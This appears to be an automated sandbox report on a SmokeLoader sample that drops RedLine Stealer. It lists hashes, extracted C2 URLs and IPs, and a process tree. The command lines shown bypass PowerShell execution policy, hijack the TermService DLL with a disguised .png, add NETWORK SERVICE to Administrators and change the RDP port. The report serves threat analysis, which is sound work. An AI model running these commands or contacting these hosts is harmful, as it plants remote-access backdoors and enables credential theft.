Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-12-2021 00:38
Static task
static1
Behavioral task
behavioral1
Sample
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Resource
win10-en-20211208
General
-
Target
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
-
Size
218KB
-
MD5
d23a607770f2dc224e7026ef676c0604
-
SHA1
c5f14029dec233da0e6b9b884a176445bdd2deec
-
SHA256
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68
-
SHA512
6b2204da4961c05be17186b03ea0bf2dddb1286b32b80c86439e777223ec8e4529e5403eab26450d1293fe3ebd7b4afd28c8b64d95daac1cfc520cb6a3b41e8e
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\B0DD.exe family_redline C:\Users\Admin\AppData\Local\Temp\B0DD.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 93 3596 powershell.exe 95 3596 powershell.exe 96 3596 powershell.exe 97 3596 powershell.exe 99 3596 powershell.exe 101 3596 powershell.exe 103 3596 powershell.exe 105 3596 powershell.exe 107 3596 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
B0DD.exeC1E6.exe49D.exepid process 1164 B0DD.exe 1412 C1E6.exe 4040 49D.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 2880 -
Loads dropped DLL 2 IoCs
Processes:
pid process 1980 1980 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI941B.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_eiori2sj.t3c.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI930F.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI942D.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dhgoqqe1.ey1.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI940A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI942C.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = af82d12985ecd701 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 97 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 95 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exepid process 2760 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe 2760 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 2880 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2880 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exepid process 2760 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 2880 Token: SeCreatePagefilePrivilege 2880 Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeIncreaseQuotaPrivilege 1812 powershell.exe Token: SeSecurityPrivilege 1812 powershell.exe Token: SeTakeOwnershipPrivilege 1812 powershell.exe Token: SeLoadDriverPrivilege 1812 powershell.exe Token: SeSystemProfilePrivilege 1812 powershell.exe Token: SeSystemtimePrivilege 1812 powershell.exe Token: SeProfSingleProcessPrivilege 1812 powershell.exe Token: SeIncBasePriorityPrivilege 1812 powershell.exe Token: SeCreatePagefilePrivilege 1812 powershell.exe Token: SeBackupPrivilege 1812 powershell.exe Token: SeRestorePrivilege 1812 powershell.exe Token: SeShutdownPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeSystemEnvironmentPrivilege 1812 powershell.exe Token: SeRemoteShutdownPrivilege 1812 powershell.exe Token: SeUndockPrivilege 1812 powershell.exe Token: SeManageVolumePrivilege 1812 powershell.exe Token: 33 1812 powershell.exe Token: 34 1812 powershell.exe Token: 35 1812 powershell.exe Token: 36 1812 powershell.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeIncreaseQuotaPrivilege 3772 powershell.exe Token: SeSecurityPrivilege 3772 powershell.exe Token: SeTakeOwnershipPrivilege 3772 powershell.exe Token: SeLoadDriverPrivilege 3772 powershell.exe Token: SeSystemProfilePrivilege 3772 powershell.exe Token: SeSystemtimePrivilege 3772 powershell.exe Token: SeProfSingleProcessPrivilege 3772 powershell.exe Token: SeIncBasePriorityPrivilege 3772 powershell.exe Token: SeCreatePagefilePrivilege 3772 powershell.exe Token: SeBackupPrivilege 3772 powershell.exe Token: SeRestorePrivilege 3772 powershell.exe Token: SeShutdownPrivilege 3772 powershell.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeSystemEnvironmentPrivilege 3772 powershell.exe Token: SeRemoteShutdownPrivilege 3772 powershell.exe Token: SeUndockPrivilege 3772 powershell.exe Token: SeManageVolumePrivilege 3772 powershell.exe Token: 33 3772 powershell.exe Token: 34 3772 powershell.exe Token: 35 3772 powershell.exe Token: 36 3772 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeIncreaseQuotaPrivilege 2140 powershell.exe Token: SeSecurityPrivilege 2140 powershell.exe Token: SeTakeOwnershipPrivilege 2140 powershell.exe Token: SeLoadDriverPrivilege 2140 powershell.exe Token: SeSystemProfilePrivilege 2140 powershell.exe Token: SeSystemtimePrivilege 2140 powershell.exe Token: SeProfSingleProcessPrivilege 2140 powershell.exe Token: SeIncBasePriorityPrivilege 2140 powershell.exe Token: SeCreatePagefilePrivilege 2140 powershell.exe Token: SeBackupPrivilege 2140 powershell.exe Token: SeRestorePrivilege 2140 powershell.exe Token: SeShutdownPrivilege 2140 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeSystemEnvironmentPrivilege 2140 powershell.exe Token: SeRemoteShutdownPrivilege 2140 powershell.exe Token: SeUndockPrivilege 2140 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 2880 2880 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 2880 2880 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
49D.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2880 wrote to memory of 1164 2880 B0DD.exe PID 2880 wrote to memory of 1164 2880 B0DD.exe PID 2880 wrote to memory of 1164 2880 B0DD.exe PID 2880 wrote to memory of 1412 2880 C1E6.exe PID 2880 wrote to memory of 1412 2880 C1E6.exe PID 2880 wrote to memory of 1412 2880 C1E6.exe PID 2880 wrote to memory of 4040 2880 49D.exe PID 2880 wrote to memory of 4040 2880 49D.exe PID 4040 wrote to memory of 1264 4040 49D.exe powershell.exe PID 4040 wrote to memory of 1264 4040 49D.exe powershell.exe PID 1264 wrote to memory of 2032 1264 powershell.exe csc.exe PID 1264 wrote to memory of 2032 1264 powershell.exe csc.exe PID 2032 wrote to memory of 1984 2032 csc.exe cvtres.exe PID 2032 wrote to memory of 1984 2032 csc.exe cvtres.exe PID 1264 wrote to memory of 2320 1264 powershell.exe csc.exe PID 1264 wrote to memory of 2320 1264 powershell.exe csc.exe PID 2320 wrote to memory of 2596 2320 csc.exe cvtres.exe PID 2320 wrote to memory of 2596 2320 csc.exe cvtres.exe PID 1264 wrote to memory of 1812 1264 powershell.exe powershell.exe PID 1264 wrote to memory of 1812 1264 powershell.exe powershell.exe PID 1264 wrote to memory of 3772 1264 powershell.exe powershell.exe PID 1264 wrote to memory of 3772 1264 powershell.exe powershell.exe PID 1264 wrote to memory of 2140 1264 powershell.exe powershell.exe PID 1264 wrote to memory of 2140 1264 powershell.exe powershell.exe PID 1264 wrote to memory of 2804 1264 powershell.exe reg.exe PID 1264 wrote to memory of 2804 1264 powershell.exe reg.exe PID 1264 wrote to memory of 1120 1264 powershell.exe reg.exe PID 1264 wrote to memory of 1120 1264 powershell.exe reg.exe PID 1264 wrote to memory of 3756 1264 powershell.exe reg.exe PID 1264 wrote to memory of 3756 1264 powershell.exe reg.exe PID 1264 wrote to memory of 1476 1264 powershell.exe net.exe PID 1264 wrote to memory of 1476 1264 powershell.exe net.exe PID 1476 wrote to memory of 2504 1476 net.exe net1.exe PID 1476 wrote to memory of 2504 1476 net.exe net1.exe PID 1264 wrote to memory of 1468 1264 powershell.exe cmd.exe PID 1264 wrote to memory of 1468 1264 powershell.exe cmd.exe PID 1468 wrote to memory of 1780 1468 cmd.exe cmd.exe PID 1468 wrote to memory of 1780 1468 cmd.exe cmd.exe PID 1780 wrote to memory of 2220 1780 cmd.exe net.exe PID 1780 wrote to memory of 2220 1780 cmd.exe net.exe PID 2220 wrote to memory of 2216 2220 net.exe net1.exe PID 2220 wrote to memory of 2216 2220 net.exe net1.exe PID 1264 wrote to memory of 700 1264 powershell.exe cmd.exe PID 1264 wrote to memory of 700 1264 powershell.exe cmd.exe PID 700 wrote to memory of 1268 700 cmd.exe cmd.exe PID 700 wrote to memory of 1268 700 cmd.exe cmd.exe PID 1268 wrote to memory of 3684 1268 cmd.exe net.exe PID 1268 wrote to memory of 3684 1268 cmd.exe net.exe PID 3684 wrote to memory of 1940 3684 net.exe net1.exe PID 3684 wrote to memory of 1940 3684 net.exe net1.exe PID 3132 wrote to memory of 2212 3132 cmd.exe net.exe PID 3132 wrote to memory of 2212 3132 cmd.exe net.exe PID 2212 wrote to memory of 1548 2212 net.exe net1.exe PID 2212 wrote to memory of 1548 2212 net.exe net1.exe PID 3228 wrote to memory of 1768 3228 cmd.exe net.exe PID 3228 wrote to memory of 1768 3228 cmd.exe net.exe PID 1768 wrote to memory of 3128 1768 net.exe net1.exe PID 1768 wrote to memory of 3128 1768 net.exe net1.exe PID 1404 wrote to memory of 3428 1404 cmd.exe net.exe PID 1404 wrote to memory of 3428 1404 cmd.exe net.exe PID 3428 wrote to memory of 3812 3428 net.exe net1.exe PID 3428 wrote to memory of 3812 3428 net.exe net1.exe PID 1840 wrote to memory of 4076 1840 cmd.exe net.exe PID 1840 wrote to memory of 4076 1840 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe"C:\Users\Admin\AppData\Local\Temp\2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\B0DD.exeC:\Users\Admin\AppData\Local\Temp\B0DD.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C1E6.exeC:\Users\Admin\AppData\Local\Temp\C1E6.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\49D.exeC:\Users\Admin\AppData\Local\Temp\49D.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FE3.tmp" "c:\Users\Admin\AppData\Local\Temp\qp0crqtk\CSC45ED1FB13AA1429D92B43D88258E46CE.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25DE.tmp" "c:\Users\Admin\AppData\Local\Temp\n4ty3n35\CSCDDE27C93210C430DAAB0D0F2814DD1C5.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
